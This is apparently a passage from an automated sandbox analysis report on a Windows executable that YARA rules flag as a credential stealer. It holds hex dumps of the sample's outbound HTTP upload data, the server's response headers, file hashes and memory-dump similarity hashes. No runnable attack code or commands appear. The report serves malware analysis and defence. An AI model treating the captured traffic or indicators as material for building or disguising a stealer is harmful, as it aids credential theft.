                                                                                                  Data Ascii: 4GE8GD/m5M!KiBs=C[l$?NDuYNJBCY,7gHV9Iqt?t W{D_yV'IEyidf{so]!Bx~Fj;0c:'n/N&><][l8X=<2+
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 28 33 6f d5 6b 6a 60 f8 7c e9 33 b8 8a 6e 1e 98 35 4e e6 18 7b 0b 24 8f d8 56 2f 9c 8a 61 ef df 09 0d db c3 55 85 85 b8 28 28 66 3c d2 05 2e ed 70 c0 4e be e0 f5 3d 9a f9 85 d4 f8 5b 1b 10 61 6c 77 49 f0 06 33 39 18 70 20 e1 84 ee 1f a1 7f 46 d7 7c 27 40 1c c7 e9 95 2f 10 05 70 dd f7 27 14 61 60 e4 b3 29 20 f6 fa 98 9e 0e fa 02 23 c7 9e 99 08 58 5b ca 0a 2e dd 3f fa 4f 48 31 b0 3f 3f 5d 3c 98 75 24 4b a1 5b 03 1c 7f d8 bc 12 50 b6 2a 9f 55 76 84 38 50 3b b3 34 f1 45 1f 60 29 f5 dc 17 3c cd ae 35 e6 63 ac c6 a5 c6 df 65 ed 29 0d 2f f2 2d af 43 a0 94 56 22 7f 9a 93 89 a6 8e 8d 86 be 57 49 38 dd dc 44 62 74 05 7f 84 11 6b 03 9c 12 57 1c da 14 d9 b1 30 ea 08 32 3c 14 9a 20 58 08 d5 ba 9b 51 c3 85 c1 da 21 4a c5 e7 83 da f0 9d 2b a8 bf 6f eb ec a1 fe 84 13 0e
                                                                                                  Data Ascii: (3okj`|3n5N{$V/aU((f<.pN=[alwI39p F|'@/p'a`) #X[.?OH1??]<u$K[P*Uv8P;4E`)<5ce)/-CV"WI8DbtkW02< XQ!J+o
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 8e 33 bc 00 be 2f 65 11 3a ea 8e d3 2f b5 86 07 da a1 31 6f bf f4 db 0e 93 fc 8d 33 da 78 53 65 41 9f d2 d1 d4 53 40 a3 34 4b 01 14 64 be 08 8d 44 bd 4c cb 61 31 bd aa b2 71 6f df 40 58 19 76 70 89 a7 72 22 d2 6d be ad 99 bf 77 e3 46 f0 84 eb 2e c9 be 63 06 05 66 07 70 af 15 08 b8 77 d8 0e 13 5d 04 80 b5 6c f3 02 b3 3f 0a 91 70 72 1a b5 d6 13 d0 2e 20 22 6e 64 78 f5 ad d0 ac 00 d1 36 a9 c0 1a 14 d8 bb 12 95 32 ae 92 a9 86 b8 3e 15 90 7b 44 a6 60 17 b0 3b 91 46 30 85 53 4d c8 84 ec 5e 8c 57 cd 0f c2 6a 77 9c 22 51 5c 90 8f ef 12 8a 3c 1c 41 75 9a e2 9a fc 24 4b 8b d7 12 f7 85 96 19 60 74 fd 6f bd 39 82 b5 e3 d6 f1 9b 5c 06 29 59 26 3f c1 5b 0c 82 17 f8 f1 10 9f 05 91 f9 d8 00 a1 86 5d 3f 4b 3c 3b f1 c6 f5 08 df c2 0a 2b 4e c9 6b 7e cf ac d4 01 61 ce 39 dc
                                                                                                  Data Ascii: 3/e:/1o3xSeAS@4KdDLa1qo@Xvpr"mwF.cfpw]l?pr. "ndx62>{D`;F0SM^Wjw"Q\<Au$K`to9\)Y&?[]?K<;+Nk~a9
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 4c 3c 4f 98 4e a7 d4 9c dc ef 3b d9 ab 58 fc aa 48 70 ca 07 cd 35 c6 f5 ad 24 80 b7 37 de 77 9f 56 ee 6e 39 15 9c 02 40 82 ac cc d8 c5 d9 b4 62 7c 5f 50 b6 ab d5 18 cf 21 ad 26 bf 00 96 12 9f cc c3 7d 05 5a 9c 9b 3a c9 28 03 2f 50 ba dd e8 3a 7b ee 0c b3 61 ed a0 9d e7 5d 63 fc e6 f8 fb a2 0f d5 9d 90 3b a2 79 d0 c3 5b d1 ed 89 f7 c9 74 12 7e 3e 7f 75 b8 a2 d2 b5 d5 e4 58 38 75 dc 6f 65 f3 ef e3 07 e3 2a 64 33 38 e0 3e 83 99 5e 9f be 9e 59 61 a7 01 96 1e f1 82 fc c1 6e 6d f5 b5 5a fe 2e dd f9 b5 e6 57 82 e6 a1 83 3d 93 cd d4 80 cd df 6c 34 3d 7f 50 13 0b 31 12 2f 32 83 cc b7 f7 16 de cb 1f da a8 18 8f d6 a6 0a 57 ad 31 93 53 79 09 60 be ca 5c 2d 7e 70 c8 ff 01 0e 6e c6 32 77 01 86 f8 4b 47 49 c0 2c e9 c0 06 5f e0 03 34 49 34 7d ff 9a 37 90 40 1b 14 e3 e6
                                                                                                  Data Ascii: L<ON;XHp5$7wVn9@b|_P!&}Z:(/P:{a]c;y[t~>uX8uoe*d38>^YanmZ.W=l4=P1/2W1Sy`\-~pn2wKGI,_4I4}7@
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 03 ef 90 bd f2 d3 3f fa 26 0f a3 60 17 a6 f9 e3 12 30 67 b9 dd 20 d4 e9 ac 2c 11 f1 a6 0b b6 9b f7 b4 03 30 6a 5c 3d 21 00 52 a3 e7 ef 6a 48 03 31 5d 60 0a 5a cb 81 87 b8 d1 f0 23 7a f5 de be 8b 74 31 10 88 e2 f4 87 d1 51 40 e2 0e 6e ec 07 cf b2 1f 84 65 ff 82 18 22 ec 67 f1 f9 fb 17 92 c6 b7 8f 90 41 f4 ca ec 7c 2c 5c 2e 77 03 65 07 dc 65 c3 c4 80 5d 76 56 41 6b 33 fe 52 64 7c 39 d6 eb e4 d3 36 47 fd 39 cb 91 ea 98 9b 93 3c 1d 92 b0 94 d0 1e 91 3f bd 29 4c 0d c2 66 c9 76 9b ce 0c 39 51 54 24 1c ee 89 3e 0f f0 10 fb b4 14 96 8b 60 00 68 43 87 51 b9 07 29 a2 af aa fd 2c 23 76 8d 70 75 3c 71 8e 0d c7 44 f3 08 dc fd f3 dd e8 8f 6e 33 f6 0f 1f b9 6f da 23 15 89 98 67 b9 78 ee e4 b4 3c 89 40 34 36 16 e6 c1 9a b6 51 ce f1 f3 97 2f 94 97 6f 4a cc 5d ee b7 b9 4b
                                                                                                  Data Ascii: ?&`0g ,0j\=!RjH1]`Z#zt1Q@ne"gA|,\.wee]vVAk3Rd|96G9<?)Lfv9QT$>`hCQ),#vpu<qDn3o#gx<@46Q/oJ]K
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 30 99 e1 10 19 8c da 04 1b d7 96 3a 37 5e bd e7 de 5a 19 07 d3 a2 c0 ee c2 f6 4e 65 c4 1f fc 0f 0d 9f cd 07 04 9f 7c 3e f0 7e 0f 1a 71 4f 40 ca 24 28 90 c5 4f 73 83 b4 0b 31 d4 57 10 5c 29 a7 06 ba 13 ce 80 82 d4 5e 4d 28 e8 90 62 81 28 f8 23 d7 27 77 d2 c7 7d d8 79 3f 68 dc dc ee 9f d6 8b 4f 39 c3 33 ff ce 6e 66 01 b6 ba 48 7f 8f e7 c2 4e 5f 5d b6 c9 74 e6 41 f5 66 ab d7 a4 8b ca 46 81 70 42 a4 6c 6a e4 3d ae 1d 1d 47 3f 39 ef 9b 94 e0 cb 33 e4 5d f1 7f 4b 44 3c 7e fa d9 e2 a7 02 e4 27 91 ad fc c7 88 c7 c0 31 44 25 3a fd cd 08 e5 fd 41 3b b8 53 86 21 3b bb 03 75 ed 74 3c 8a c4 a3 81 ba 20 52 3b 66 ed 87 3e 37 03 88 2e f2 08 e5 5c d3 51 23 74 c5 c0 a5 e4 d7 4f 9e b2 b2 76 2b 4c f2 61 b6 d0 f3 d6 8d 59 ea 49 e4 a4 31 31 ae ce 04 fc 12 7e 11 bf 3e 2d 57 15
                                                                                                  Data Ascii: 0:7^ZNe|>~qO@$(Os1W\)^M(b(#'w}y?hO93nfHN_]tAfFpBlj=G?93]KD<~'1D%:A;S!;ut< R;f>7.\Q#tOv+LaYI11~>-W
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 52 b8 61 a1 80 c7 bd 85 58 c0 c4 0e 7d 7b 51 a6 ac 91 78 7d b5 80 92 00 53 ad 8d 4e 84 e9 f4 a1 15 35 06 a0 65 dc a1 09 80 66 27 b9 b1 75 f9 bb f7 ba 43 93 96 c7 e3 f2 73 ec 52 ae 7c 2e 5e 16 0c 69 9d 1c 0d 3f b9 f0 f8 dd 6e 44 59 4b fd a5 d1 cf b7 5a 05 5f a2 2e 17 dc 5c 58 5d 24 13 91 0b ff 7b d4 b2 0c b9 e8 dc b7 c5 68 96 3b 32 f6 9d f0 f9 f2 e7 6c 9e d6 9b d1 9c 84 ef ec 8d d1 44 da 8a 22 63 07 4b c1 83 38 3c 36 39 4b 09 fe a0 c2 60 ff e2 c6 a1 d3 a2 e0 54 35 31 f3 cc 3d 13 9e a7 1c eb 87 a6 bc e0 64 ea c1 bc 1c be 85 b6 45 37 47 ea 9b ad 92 e8 f9 d5 57 04 de 64 f1 1b df ae c3 cc 68 75 8f 3d af 46 de 57 d9 22 b2 0f db 69 70 7f 59 87 51 55 c1 07 9d 2e 3d 24 12 17 ab 56 cd 35 61 c7 b4 a9 1c fd fe f2 ad cf ad 0b 07 82 32 5e 5d 97 88 3f 33 cb 70 fe 4c a0
                                                                                                  Data Ascii: RaX}{Qx}SN5ef'uCsR|.^i?nDYKZ_.\X]${h;2lD"cK8<69K`T51=dE7GWdhu=FW"ipYQU.=$V5a2^]?3pL
                                                                                                  2024-12-16 16:15:16 UTC15331OUTData Raw: 09 1b 01 6d 04 62 58 06 47 d1 b7 bf a3 d2 79 63 61 bf 9a d2 13 85 7c 60 06 07 95 51 ed 28 f6 e3 6c bc df 35 f3 fa 8b db fe 27 2f 04 9f bf d2 66 af a6 b5 f8 be 6a 16 ba 64 77 16 6b 94 6e 50 78 ae 54 f8 c1 54 d9 aa c1 5b 4d 5b 5b 71 96 ac e6 3e a6 52 ba eb b5 53 da 6d 52 0e e7 a5 f8 4c 49 81 41 cb 6d 89 31 0e 1f f6 44 d3 7d 96 77 85 07 bd 5b d8 82 b0 57 d9 31 5a 34 63 d1 fb b5 45 4b af d2 cd 8f 0d 0d a2 5b a7 e5 10 e7 22 a9 ab bc 03 2b 52 94 71 1c 2d d5 b8 68 b3 38 77 a3 e0 5b 40 0a 45 9f 73 ff 45 b3 47 be dc f3 f7 29 5b b7 d9 39 a3 1f ca 45 b9 5e b7 cb 6d ea a4 ad cf da 98 bd a7 df 2c 9d bf dd fc ee d5 db d0 e9 47 39 ed 2b 21 82 8b cc b6 ac fd 96 b9 52 0a 15 57 84 c8 e5 36 e2 dc 37 88 23 f3 af 5e 4e b9 7d b2 9e 5d 91 28 5f 49 ee f4 b7 50 b9 60 11 5c f5 2e
                                                                                                  Data Ascii: mbXGyca|`Q(l5'/fjdwknPxTT[M[[q>RSmRLIAm1D}w[W1Z4cEK["+Rq-h8w[@EsEG)[9E^m,G9+!RW67#^N}](_IP`\.
                                                                                                  2024-12-16 16:15:19 UTC1015INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:19 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=48h62a6j1lt7ldenoui0bgbur9; expires=Fri, 11-Apr-2025 10:01:57 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBFiQUJmQqynXTqes5eWtAWmBmQOq8h0u5GI7qaLpqVszfyzYnvxIwRrcRWOvgB51MWd4o3zn7HwzmtE0voTdYMI%2FwskpJqOsM0jB7cLrj6k1bqDKyexgsNWGEP3hkjFJE4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff8a2bee67ca8-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=1994&rtt_var=769&sent=292&recv=610&lost=0&retrans=0&sent_bytes=2838&recv_bytes=590295&delivery_rate=1403171&cwnd=238&unsent_bytes=0&cid=76b246a112e9d80a&ts=2550&x=0"


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Target ID:0
                                                                                                  Start time:11:14:58
                                                                                                  Start date:16/12/2024
                                                                                                  Path:C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\wf1Ps82LYF.exe"
                                                                                                  Imagebase:0x8a0000
                                                                                                  File size:1'884'672 bytes
                                                                                                  MD5 hash:9B88AFC4511D0FE8ACA6080D34F2DD66
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1540480401.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1540788781.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Reset < >
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1615918286.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Offset: 01068000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_1068000_wf1Ps82LYF.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
                                                                                                    • Instruction ID: 99c948993cde92b7031c668009cb04e89e1212e77fca5c277496ae41edb74eb4
                                                                                                    • Opcode Fuzzy Hash: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
                                                                                                    • Instruction Fuzzy Hash: 6D41BE3504A3959BC71ACF30D685A86BFA4FF4731072882CEE4815F123C371665ADB96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000003.1537108553.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, Offset: 059E1000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_3_59e1000_wf1Ps82LYF.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
                                                                                                    • Instruction ID: 18a7979182142c6a76a9746b1ff6eda87dd2aa675668835bad91b95888c631b4
                                                                                                    • Opcode Fuzzy Hash: a4178830387a00bc3f01ecb7d24551bf85c4ae5fdb1abdc6ee5eb36cc464fab5
                                                                                                    • Instruction Fuzzy Hash: 4F41CF3500A3959BC71BCF30D686A87BFA5FF47310728828EE4815F223C370665ADB96